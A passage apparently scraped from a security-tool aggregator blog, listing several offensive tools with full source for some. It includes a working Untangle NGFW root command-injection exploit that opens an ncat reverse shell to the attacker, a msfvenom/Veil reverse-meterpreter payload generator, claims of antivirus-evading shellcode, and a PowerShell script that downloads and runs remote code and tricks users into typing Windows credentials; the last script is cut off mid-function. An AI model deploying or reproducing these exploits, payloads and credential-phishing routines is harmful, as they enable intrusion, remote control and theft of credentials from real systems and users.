– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip | Our Post Before
Source : http://www.labofapenetrationtester.com/

Changelog v1.1.22 Full Featured:
+ setup.py and Bluto folder version Fix.

Bluto v1.1.22

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the ‘The Alexa Top 1 Million subdomains’. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Bluto-v-1-1-14
Bluto is attempting to brute force the target domain. this Tools has been tested on Ubuntu, Arch Linux, Centos, FreeBSD,redhat Fedora, Debian And Kali 2.0

Installation And Update Using Git:

pip install git+git://github.com/RandomStorm/Bluto
Upgrade:
pip install git+git://github.com/RandomStorm/Bluto --upgrade

Our Post Before
Source: https://github.com/RandomStorm

Latest Change v1.0.9-git:
+ commands.py; Download and Execute Shellcode.
+ stack.py & opcoder.py; Windows Exec Shellcode and Opcoder.
+ lib/generator/windows/download_exec.py; Download and Execute Shellcode.

THIS SOFTWARE WAS CREATED TO CHALLENGE ANTIVIRUS TECHNOLOGY, RESEARCH NEW ENCRYPTION METHODS, AND PROTECT SENSITIVE OPEN SOURCE FILES WHICH INCLUDE IMPORTANT DATA. CONTRIBUTORS AND OWASP FOUNDATION WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL USAGE.

OWASP ZSC is open source software written in python which lets you generate customized shellcode and convert scripts to an obfuscated script. This software can be run on Windows/Linux/OSX with python.

Why use OWASP ZSC ?
According to other shellcode generators same as metasploit tools and etc, OWASP ZSC using new encodes and methods which antiviruses won’t detect. OWASP ZSC encoderes are able to generate shellcodes with random encodes and that’s lets you to get thousands new dynamic shellcodes with same job in just a second,that means you will not get a same code if you use random encodes with same commands, And that make OWASP ZSC one of the bests! otherwise it’s gonna generate shellcodes for many operation systems in next versions. It’s the same story for code obfuscating.

Use and Download:

git clone https://github.com/Ali-Razmjoo/OWASP-ZSC && cd OWASP-ZSC
python zsc.py

Update:
git pull origin master
typing update at zsc console

Source: https://github.com/Ali-Razmjoo

Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit.
A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).

Disclosure Timeline:
22/4/2016: Attempted to contact vendor after discovery of vulnerabilities
6/5/2016: No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
12/5/2016: US-CERT confirms contacting vendor
16/6/2016: US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
27/6/2016: Public disclosure

Usage:

git clone https://github.com/3xocyte/Exploits && cd Exploits
python untangle-ngfw-12.1-ci.py <RHOST> <LHOST> <username> <password>

Script:

#!/usr/bin/python

# Title: 			Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit
# CVE:				(Not yet assigned)
# Discovery:			Matt Bush (@3xocyte)
# Exploit:			Matt Bush
# Contact:			mbush@themissinglink.com.au

# Disclosure Timeline:
# 22/4/2016			Attempted to contact vendor after discovery of vulnerabilities
# 6/5/2016			No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
# 12/5/2016			US-CERT confirms contacting vendor
# 16/6/2016			US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
# 27/6/2016 			Public disclosure

# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with
# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous 
# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages
# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).

# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid.

import json, requests, sys

if len(sys.argv) < 5:
	print "[!] usage: " + sys.argv[0] + " <RHOST> <LHOST> <username> <password>"
	print "[!] and in a separate terminal: 'ncat --ssl -nlvp 443'"
	sys.exit()

print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit"
print "                          by @3xocyte\n"

rhost = sys.argv[1]
lhost = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]

login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator"
rpc_url = "http://" + rhost + "/webui/JSON-RPC"
auth = {'username': username, 'password': password}

print "[*] Opening session..."
session = requests.Session()

print "[*] Authenticating..."
try:
	login = session.post(login_url, data=auth)
	get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]}
	req_nonce = session.post(rpc_url, data=json.dumps(get_nonce))
	data = json.loads(req_nonce.text)
	nonce = data['result']
except:
	print "[!] Authentication failed. Quitting."
	sys.exit()

print "[*] Getting execManager objectID..."
try:
	get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]}
	req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id))
	data = json.loads(req_obj_id.text)
	object_id = data['result']['execManager']['objectID']

except:
	print "[!] Could not get execManager objectID. Quitting."
	sys.exit()

print "[*] Exploiting Ung.Main.getExecManager().execEvil()..."
try:
	exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]}
	session.post(rpc_url, data=json.dumps(exploit))
except:
	print "[!] Exploit failed. Quitting."
	sys.exit()

print "[*] Exploit sent!"

Source: https://github.com/3xocyte

Changelog v9.5:
+ Best optimization.

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libreries to install:
ap-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works in linux platforms. Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy.

Examples:
Simple search:
Search: –dork [dork] –level [level]
Search + get ip: –dork [dork] –level [level] –ip
Search + get ip + server: –dork [dork] –level [level] –ip –server
Search with many dorks: –dork [dork1,dork2,dork3] –level [level]
Search + get ip+server: –dork [dorks.txt] –level [level]
Search + set save file: –dork [dorks.txt] –level [level] –save myfile.txt
Search + Replace + Exploit: –dork [dorks.txt] –level [level] –replace [string] –with [string] –valid [string]

Subscan from Serach Engine:
Search + Exploitation: –dork [dork] –level [10] –xss/–lfi/–wp …
Search + Server Exploitation: -t [ip] –level [10] –xss/–lfi/–wp …
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –exp [exploit] –xss/–lfi/–wp …

Validation:
Search + Exploit + Validation: –dork [dork] –level [10] –exp –isup/–valid [string]
Search + Server Exploit + Validation: -t [ip] –level [10] –exp –isup/–valid [string]
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –isup/–valid [string]

Use List / Target:
-t [target/targets.txt] –exp –isup/–valid [string]
-t [target/targets.txt] –xss/–lfi ..

Server:
Get Server sites: -t [ip] –level [value] –sites
Get Server wordpress sites: -t [ip] –level [value] –wp
Get Server joomla sites: -t [ip] –level [value] –joom
Get Server upload sites: -t [ip] –level [value] –upload
Get Server zip sites files: -t [ip] –level [value] –zip
WP Arbitry File Download: -t [ip] –level [value] –wpadf
Joomla RFI: -t [ip] –level [1] –joomfri –shell [shell link]
Scan basic tcp (quick): -t [ip] –ports –basic tcp
Scan basic udp basic (quick): -t [ip] –ports –basic udp
Scan basic udp+tcp: -t [ip] –ports –basic udp+tcp
Scan complete tcp: -t [ip] –ports –all tcp
Scan complete udp: -t [ip] –ports –all udp
Scan complete udp+tcp: -t [ip] –ports –all udp+tcp
Scan rang tcp: -t [ip] –ports –select tcp –start [value] –end [value]
Scan rang udp: -t [ip] –ports –select udp–start [value] –end [value]
Scan rang udp + tcp: -t [ip] –ports –select udp+tcp –start [value] –end [value]

Encode / Decode:
Generate MD5: –md5 [string]
Encode base64: –encode64 [string]
Decode base64: –decode64 [string]

External Command:
–dork [dork/dorks.txt] –level [level] –command “curl -v –TARGET”
–dork [dork/dorks.txt] –level [level] –command “curl -v –FULL_TARGET”
-t [target/targets.txt] –level [level] –command “curl -v –TARGET”
-t [target/targets.txt] –command “curl -v –FULL_TARGET”

How to Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before Download: v9.5.zip | v9.5.tar.gz

changelog v0.5:
+ payday.py : Added Veil path as variable in main function and then pass this to other function calls.

Payload generator that uses Metasploit and Veil. Takes IP address input and then builds payloads automatically. Calls Veil framework with supplied IP address and creates binaries and handlers. Uses msfvenom to create payloads and writes resource handler files in the same way that Veil does.

payday

Requirements:
+ Metasploit Framework
+ python 2.7.x
Options:
– Generate Metasploit Payloads
– Generate Veil Payloads
– Generate Both
– Clean Out Directories
– Specify custom output directory
– Clean custom output directory

Usage:

git clone https://github.com/lorentzenman/payday && cd payday
./payday.py
Update:
git pull origin master

Script:

#!/usr/bin/python
# Author : Matt Lorentzen
# version 0.5

import os, sys, time, argparse

def banner():

	version = "the kitchen sink edition"
    
	banner = """
                       _
 _ __   __ _ _   _  __| | __ _ _   _
| '_ \ / _` | | | |/ _` |/ _` | | | |
| |_) | (_| | |_| | (_| | (_| | |_| |
| .__/ \__,_|\__, |\__,_|\__,_|\__, |
|_|          |___/             |___/
                 %s
""" %version
     
	print redtxt(banner)


def msf_payloads(ip, output_dir):
	# Payloads Dictionary
	payloads = []

	payloads.append(["windows/meterpreter/reverse_tcp",443, "exe", "revmet.exe"])
	payloads.append(["windows/x64/meterpreter/reverse_tcp", 443, "exe", "revmet64.exe"])
	payloads.append(["windows/meterpreter/reverse_http",443, "exe", "methttp.exe"])
	payloads.append(["windows/meterpreter/reverse_https",443, "exe", "methttps.exe"])
	payloads.append(["windows/x64/meterpreter/reverse_tcp",443, "exe-service" , "serv64.exe"])
	payloads.append(["windows/meterpreter/reverse_tcp",443, "exe-service" ,"serv.exe"])
	payloads.append(["windows/meterpreter/reverse_tcp",443, "dll", "revmetdll.dll"])
	payloads.append(["windows/x64/meterpreter/reverse_tcp",443, "dll", "revmetdll64.dll"])

	#./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe

	for parms in payloads:
		lhost = ip
		payload = parms[0]
		lport = str(parms[1])
		output_type = parms[2]
		ext = parms[3]
		base = output_dir
		venom_cmd = "msfvenom -p " + payload + " LHOST=" + ip + " LPORT=" + lport + " -f " + output_type + " -o " + base + ext
		print "[!] Generating : " + bluetxt(payload)
		os.system(venom_cmd)
		print "[!] Generating handler for : " + bluetxt(payload)
		# strip off ext and replace with .rc

		handler = ext.split(".")[0] + ".rc"
		handler_file = open(base + "handlers/" + handler , "w")
		handler_file.write("use exploit/multi/handler\n")
		handler_file.write("set payload " + payload +"\n")
		handler_file.write("set LPORT 443\n")
		handler_file.write("set LHOST " + ip + "\n")
		handler_file.write("set ExitOnSession False\n")
		handler_file.write("exploit -j -z\n")
		handler_file.close()
		print "[!] Generated : " + yellowtxt(handler) + "\n\n"


def veil_payloads(ip, output_dir, move_payloads, veil_script):
	""" Takes local IP address as LHOST parm and builds Veil payloads"""
	# Veil doesn't have a custom output directory option and the default path gets pulled from the config file
	# hacky approach :: copy each generated payload and handler in to the custom output directory if it is supplied
	# start empty list to hold
	payloads = []
	# appends payloads with nested 3 value list for dynamic parm calling
	payloads.append(["cs/meterpreter/rev_https", 443, "veil_rev_https"])
	payloads.append(["c/meterpreter/rev_tcp",443,"veil_rev_tcp_met"])
	payloads.append(["c/meterpreter/rev_http_service",443, "veil_rev_http_srv"])


	print "Creating Veil Goodness"
	for parms in payloads:
		lhost = ip
		payload = parms[0]
		lport = str(parms[1])
		output = parms[2]
		command = ("-p " + payload + " -c LHOST=" + lhost + " LPORT=" + lport + " -o " + output + " --overwrite")
		os.system(veil_script + " " + command)
		time.sleep(2)
		# if using a custom output directory, veil doesn't have an option to specify the base directory as it gets this from the conf file
		# payload generated above has unique 'base' name - access the list and check the boolean flag that is pushed in
		# if this is true, move the file/handler into the custom output directory so that all payloads are in custom location
		if move_payloads == True:
			# move payload
			os.system("mv /root/payloads/windows/" + output + ".exe "  + output_dir)
			os.system("mv /root/payloads/windows/" + output + ".dll "  + output_dir)
			# move handler
			os.system("mv /root/payloads/windows/handlers/" + output + "_handler.rc " + output_dir + "handlers")

def php_payloads(ip, output_dir):
	""" Creates PHP based raw shell and outputs as txt ready for RFI """
	payloads = []
	payloads.append(["php/meterpreter/reverse_tcp", 443, "raw" ,"pshell.txt"])
	# TODO : push out the payload generation to a dedicated function to remove the code duplication
	for parms in payloads:
		lhost = ip
		payload = parms[0]
		lport = str(parms[1])
		output_type = parms[2]
		ext = parms[3]
		base = output_dir
		venom_cmd = "msfvenom -p " + payload + " LHOST=" + ip + " LPORT=" + lport + " -f " + output_type + " -o " + base + ext
		print "[!] Generating : " + bluetxt(payload)
		os.system(venom_cmd)
		print "[!] Generating handler for : " + bluetxt(payload)
		# strip off ext and replace with .rc

		handler = ext.split(".")[0] + ".rc"
		handler_file = open(base + "handlers/" + handler , "w")
		handler_file.write("use exploit/multi/handler\n")
		handler_file.write("set payload " + payload +"\n")
		handler_file.write("set LPORT 443\n")
		handler_file.write("set LHOST " + ip + "\n")
		handler_file.write("set ExitOnSession False\n")
		handler_file.write("exploit -j -z\n")
		handler_file.close()
		print "[!] Generated : " + yellowtxt(handler) + "\n\n"
	
	# close this file and then move to backup - crazy stuff to get around read/write/edit locks
	orig_file = str(base + ext)
	backup_file = orig_file + '.bak'
	os.rename(orig_file, backup_file)
	# now open this file and remove the comments in php so that the file works
	holding = open(backup_file, 'r')
	new_file = open(orig_file, 'w')
	lines = holding.readlines()
	for line in lines: 
		if line.startswith('/*<?php /**/'):
			line = line.replace('/*<?php /**/', '<?php')
			new_file.write(line)
		new_file.close()
	holding.close()
	os.remove(str(backup_file))




def clean(payload_path, veil_script):
	""" Cleans out directory """
	# start with default Veil direcory - gets rid of hashes etc
	os.system(veil_script + " --clean")
	os.system("clear")
 	print yellowtxt("[!] Now cleaning default output directory\n")
	# clean out generated payloads in default or custom directory
	for file in os.listdir(payload_path):
		file = payload_path + file
		if os.path.isfile(file):
			print "[!] Removing " + bluetxt(file)
			os.remove(file)



def get_payload_output(payload_output_dir):
	""" Builds directory structure if output option is supplied """
	output_dir = payload_output_dir
	# check to see if the trailing slash has been added to the path : ie /root/path
	if not output_dir.endswith("/"):
		output_dir = output_dir + "/"

	# creates the structure if it doesn't exist
	if not os.path.isdir(output_dir):
		print yellowtxt("[!] Creating output directory structure")
		os.mkdir(output_dir)
		os.chdir(output_dir)
		os.mkdir('handlers')

	return output_dir



###############################
### 	Helper Function	    ###
###############################

def redtxt(text2colour):
	redstart = "\033[0;31m"
	redend = "\033[0m"
	return redstart + text2colour + redend

def greentxt(text2colour):
	greenstart = "\033[0;32m"
	greenend = "\033[0m"
	return greenstart + text2colour + greenend

def yellowtxt(text2colour):
	yellowstart = "\033[0;33m"
	yellowend = "\033[0m"
	return yellowstart + text2colour + yellowend

def bluetxt(text2colour):
	bluestart = "\033[0;34m"
	blueend = "\033[0m"
	return bluestart + text2colour + blueend



##############################
##	 Main Function	   ###
##############################


def Main():
	# program version
	version = 0.5
	banner()
	default_path = '/root/payloads/windows'
	veil_script = '/root/tools/attacking/Veil/Veil-Evasion/./Veil-Evasion.py'

	parser = argparse.ArgumentParser(description="Payday Payload Generator :: Takes the IP Address and then builds meterpreter windows payloads using msfvenom and veil. Outputs to '/root/payloads/windows/' by default.")
	parser.add_argument("--veil", action="store_true", help='Veil Payloads')
	parser.add_argument("--msf", action="store_true", help='MSF Payloads > tcp/exe, tcp/http(s), exe-service, dll')
	parser.add_argument("--php", action="store_true", help='Creates PHP payload as txt file for LFI/RFI')
	parser.add_argument("--clean", action="store_true", help="Cleans out existing files in the output directory")
	parser.add_argument("--output", help="Specify new output directory.")
	parser.add_argument("--ip", help='Specify Local IP Address for reverse connections')
	

	# counts the supplied number of arguments and prints help if they are missing
	if len(sys.argv)==1:
		parser.print_help()
			
		sys.exit(1)

	args = parser.parse_args()

	# default variable setup
	ip = args.ip
	output_dir = ""
	move_payloads = False

	# set up default path
	if args.output:
		output = args.output
		output_dir = get_payload_output(output)
		move_payloads = True

	else:
		# default directory output :: Veil config points to the this location
		output_dir = "/root/payloads/windows/"
		# add check to see if this direcory exists and if not, create it
		if not os.path.isdir(output_dir):
			print bluetxt("[*] The default path : %s is missing") %output_dir
			print yellowtxt("[!] You need to create this default path")
			sys.exit(1)
			#os.mkdir(output_dir)
			#os.chdir(output_dir)
			#os.mkdir('handlers')

	if args.veil:
		if not ip:
			print "[!] IP address required with this payload option :: --veil --ip <Address>"
		else:
			print yellowtxt("[!] Encoding Veil payloads")
			veil_payloads(ip ,output_dir, move_payloads, veil_script)


	if args.msf:
		if not ip:
			print "[!] IP address required with this payload option :: --msf --ip <Address>"
		else:
			print yellowtxt("[!] Encoding MSF Payloads")
			msf_payloads(ip, output_dir)


	if args.php:
		if not ip:
			print "[!] IP address required with this payload option :: --php --ip <Address>"
		else:
			print yellowtxt("[!] Encoding PHP Payloads")
			php_payloads(ip, output_dir)



	if args.clean:
		if args.output:
			output_dir = get_payload_output(output)
			print redtxt("Cleaning out Payload and Handler File directories in : ") + yellowtxt(output_dir)
			clean(output_dir, veil_script)
		else:
			payload_paths = ["/root/payloads/windows/","/root/payloads/windows/handlers/"]
			print redtxt("Cleaning out Payload and Handler File directories")
			for payload_path in payload_paths:
				clean(payload_path, veil_script)


if __name__ == "__main__":
Main()

Source: https://github.com/lorentzenman | Our Post Before

Changelog v1.4.3 : + mpc.sh: Removes the use of IPv6 when in the IP selection menu, as it’s not yet supported.

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user’s life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
+ Can’t remember your IP for a interface? Don’t sweat it, just use the interface name: eth0.
+ Don’t know what your external IP is? MPC will discover it: wan.
+ Want to generate one of each payload? No issue! Try: loop.
+ Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.
Install
+ Designed for Kali Linux v2.x & Metasploit v4.11+.
+ Kali v1.x should work.
+ OSX 10.11+ should work.
+ Ubuntu 12-15 & Metasploit Should work.
+ Weakerth4n 6+ should work.
+ …nothing else has been tested.

Installation using git:

git clone https://github.com/g0tmi1k/mpc && cd mpc
./mpc.sh

update
cd mpc 
git pull

Download : v1.4.3.zip  | v1.4.3.tar.gz
Source : https://github.com/g0tmi1k
Our Post Before : http://seclist.us/msfvenom-payload-creator-mpc-v-1-4-2.html

Force HTTP GET in a computer with unknow internet config, trying to download the URL by downloading it directly and if it can’t then using default proxy credentials and .pac proxy list. If none o them works, it will trick the user and request his credentials using the Windows default credential prompt.
Description:
Normally this script should be used in a pentest environment, when you’re running this code in a target computer where you don’t know exactly what is the outbound internet config. Internally, Invoke-ForceWebRequest will use another two functions:
+ Invoke-BasicWebRequest: another function writed by me which allow me to create http webrequest with proxy config. Similar (but very basic) to Invoke-WebRequest native PowerShell function (which is only available on PowerShell v3+).
+ Invoke-LoginPrompt: an improved version of this great function wrote by @enigma0x3

usage:

Example
PS C:\> Invoke-ForceWebRequest google.com -DummyString html -Verbose
VERBOSE: Trying http get with method #1: simple request...

StatusCode Content
---------- -------
       200 <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="es"><head><meta content="IE=edge" http-equiv="X-UA-Co...

Script:

#requires -version 2
function Invoke-ForceWebRequest {
    <#
    .SYNOPSIS
        Force HTTP GET in a computer with unknow internet config, trying to download the URL by downloading it directly and if it can't then using default proxy credentials and .pac proxy list. If none o them works, it will trick the user and request his credentials using the Windows default credential prompt.
    .PARAMETER URL
        [String], required=true, ValueFromPipeline=true
        URL to download. e.g.: comandandcontrol.com/payload.txt
    .PARAMETER DummyURL
        [String], required=false
        URL to download with some DummyString you know is in there.
        If you leave it empty, URL parameter will be used as DummyURL. So be sure you use a DummyString that you're for sure is in URL.
    .PARAMETER DummyString
        [String], required=false
        String that will be checked if it is in DummyURL URL. We do that because sometimes proxys returns 200 OK to all requested sites but with a fake content.
        E.g.: use the name of a function you know is in DummyURL.
        By default, DummyString will be 'dummystring', so you could include that string in your malicious function un DummyURL.
    .OUTPUTS
        [PSObject]
        StatusCode Content
        ---------- -------
              200  <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="es"><head><meta content="IE=edge" http-equiv="X-UA-Co...
    .EXAMPLE
        PS C:\> . .\Invoke-ForceWebRequest.ps1
        PS C:\> Invoke-ForceWebRequest google.com -DummyString html -Verbose
        VERBOSE: Trying http get with method #1: simple request...
        StatusCode Content
        ---------- -------
               200 <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="es"><head><meta content="IE=edge" http-equiv="X-UA-Co...
    .EXAMPLE
        From a red-team point of view, running this code on a target machine:
        (assuming you wrote the script in the target computer to $env:temp folder)
        C:\> powershell.exe -ep bypass -windowstyle hidden -nop -noexit -c "gc $env:temp\Invoke-ForceWebRequest.ps1 | out-string | iex; Invoke-ForceWebRequest comandandcontrol.com/payload.txt -DummyString someCode | % { if ($_.StatusCode -eq 200) { $_.Content | out-string | iex } }"
            1: it will download code from URL comandandcontrol.com/payload.txt
            2: then it will check if the content of payload.txt is correct by checking a dummy-string that you know is inside payload.txt
            3: invoke (run) code of payload.txt (if you're a redteamer it will be some malicious code)
    .LINK
        https://github.com/daniel0x00/forcewebrequest
        https://github.com/enigma0x3/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1 by @enigma0x3
    #>
    [CmdletBinding()]
    [OutputType([psobject])]
    param(
        [Parameter(Mandatory=$true,
                   ValueFromPipeline=$true,
                   Position=0)]
        [String]
        $URL,

        [Parameter(Mandatory=$false)]
        [String]
        $DummyURL,

        [Parameter(Mandatory=$false)]
        [String]
        $DummyString = 'dummystring'
    )
    begin {
        # Modified version of 'Invoke-LoginPrompt' by @enigma0x3
        # https://github.com/enigma0x3/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1
        function Invoke-LoginPrompt {
            do {
                $cred = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
                $username = "$env:username"
                $domain = "$env:userdomain"
                $full = "$domain" + "\" + "$username"
                $password = $cred.GetNetworkCredential().password
                Add-Type -assemblyname System.DirectoryServices.AccountManagement
                $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
                $continue = $true
                try { if ($DS.ValidateCredentials("$full", "$password") -eq $true) { $continue = $false } } 
                catch { $continue = $false }
            } while ($continue -eq $true);
            
            $output = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
            $output
        }

        # Invoke-BasicWebRequest by @daniel0x00
        #
        function Invoke-BasicWebRequest {
            [CmdletBinding()]
            [OutputType([psobject])]
            param(
                [Parameter(Mandatory=$true,
                        ValueFromPipeline=$true,
                        Position=0)]
                [ValidateNotNullOrEmpty()]
                [String]
                $URL,

                [Parameter(Mandatory=$false)]
                [String]
                $UserAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko',

                [Parameter(Mandatory=$false)]
                [String]
                $ProxyURL,

                [Parameter(Mandatory=$false)]
                [String]
                $ProxyUser,

                [Parameter(Mandatory=$false)]
                [String]
                $ProxyPassword,

                [Parameter(Mandatory=$false)]
                [Switch]
                $ProxyDefaultCredentials
            )

            # Ensure URLs contains at least an 'http' protocol:
            if (-not ($URL -match "http")) { $URL = 'http://'+$URL }
            if (($ProxyURL) -and (-not ($ProxyURL -match "http"))) { $ProxyURL = 'http://'+$ProxyURL }

            $request = [System.Net.WebRequest]::Create($URL)
            $request.UserAgent = $UserAgent
            $request.Accept = "*/*"

            # Proxy settings
            if ($ProxyURL) { 
                $proxy = New-Object System.Net.WebProxy
                $proxy.Address = $ProxyURL
                $request.Proxy = $proxy

                if ($ProxyUser) {
                    if ($ProxyDefaultCredentials) {
                        $request.UseDefaultCredentials = $true
                    }
                    else {
                        $secure_password    = ConvertTo-SecureString $ProxyPassword -AsPlainText -Force;
                        $proxy.Credentials  = New-Object System.Management.Automation.PSCredential ($ProxyUser, $secure_password);
                    }
                }
            }

            try {
                $response               = $request.GetResponse()
                $response_stream        = $response.GetResponseStream();
                $response_stream_reader = New-Object System.IO.StreamReader $response_stream;
                $response_text          = $response_stream_reader.ReadToEnd(); 
                $response_status_code   = ($response.StatusCode) -as [int]

                $out = New-Object -TypeName PSObject
                $out | Add-Member -MemberType NoteProperty -Name StatusCode -Value $response_status_code
                $out | Add-Member -MemberType NoteProperty -Name Content -Value $response_text
                $out
            }
            catch {
                $response = $_.Exception.InnerException
                $response_status_code = [int](([regex]::Match($_.Exception.InnerException,"\((?<status_code>\d{3})\)")).groups["status_code"].value)

                $out = New-Object -TypeName PSObject
                $out | Add-Member -MemberType NoteProperty -Name StatusCode -Value $response_status_code
                $out | Add-Member -MemberType NoteProperty -Name Content -Value $response
                $out
            }
        }
    }
    process {
        # Ensure URLs contains at least an 'http' protocol:
        if (-not ($URL -match "http")) { $URL = 'http://'+$URL }
        if (!$DummyURL) { $DummyURL = $URL }
        if (-not ($DummyURL -match "http")) { $DummyURL = 'http://'+$DummyURL }

        # 1: no-proxy webrequest
        Write-Verbose "Trying http get with method #1: simple request..."
        $request = Invoke-BasicWebRequest $DummyURL
        if ($request | select -first 1 | % { $_.content -match $DummyString }) { 
            $request = Invoke-BasicWebRequest $URL
            return
        }

        # getting basic proxy settiongs
        $proxy_settings     = Get-ItemProperty 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
        $proxy_server       = $proxy_settings | % { $_.ProxyServer }
        $proxy_auto_url     = $proxy_settings | % { $_.AutoConfigURL }
        $proxy_pac_regex    = "PROXY\s+(?<proxy>[A-Za-z0-9\.\-\_]+\:\d{1,5})"

        # 2: basic-server webrequest
        Write-Verbose "Trying http get with method #2: request with just URL proxy ($proxy_server)..."
        $request = Invoke-BasicWebRequest $DummyURL -ProxyURL $proxy_server -ProxyDefaultCredentials
        if ($request | select -first 1 | % { $_.content -match $DummyString }) {
            $request = Invoke-BasicWebRequest $URL -ProxyURL $proxy_server -ProxyDefaultCredentials
            return
        }

        # 3: .pac webrequest
        if ($proxy_auto_url -ne $null) {
            $proxy_pac_config   = (New-Object System.Net.WebClient).DownloadString($proxy_auto_url)
            
            if ($proxy_pac_config -ne $null) {
                # iterate through each proxy url match:
                $proxy_pac_config | Select-String $proxy_pac_regex -AllMatches | % { $_.Matches } | % { 
                    # request dummystring for each proxy-url
                    $proxy_server_pac = $_.Groups["proxy"].Value

                    Write-Verbose "Trying http get with method #3: request with just URL proxy from .pac file ($proxy_server_pac)..."
                    $request = Invoke-BasicWebRequest $DummyURL -ProxyURL $proxy_server_pac
                    if ($request | select -first 1 | % { $_.content -match $DummyString }) {
                        $request = Invoke-BasicWebRequest $URL -ProxyURL $proxy_server_pac
                        return
                    }
                }
            }
        }

        # 4: at this point, we need to trick the user with a fake credential request.
        #    the credential window will be the Windows original one, so user should not suspect of a malicious activity.
        #    user will be prompt until he/she writes a valid credential. 
        Invoke-LoginPrompt | ForEach-Object {
            $username   = $_.UserName
            $password   = $_.Password
            Write-Verbose "We have the credentials of $username user!"

            # 4.1: request with the default proxy URL and credentials.
            Write-Verbose "Trying http get with method #4.1: request with URL proxy ($proxy_server) and $username credential..."
            $request = Invoke-BasicWebRequest $DummyURL -ProxyURL $proxy_server -ProxyUser $username -ProxyPassword $password
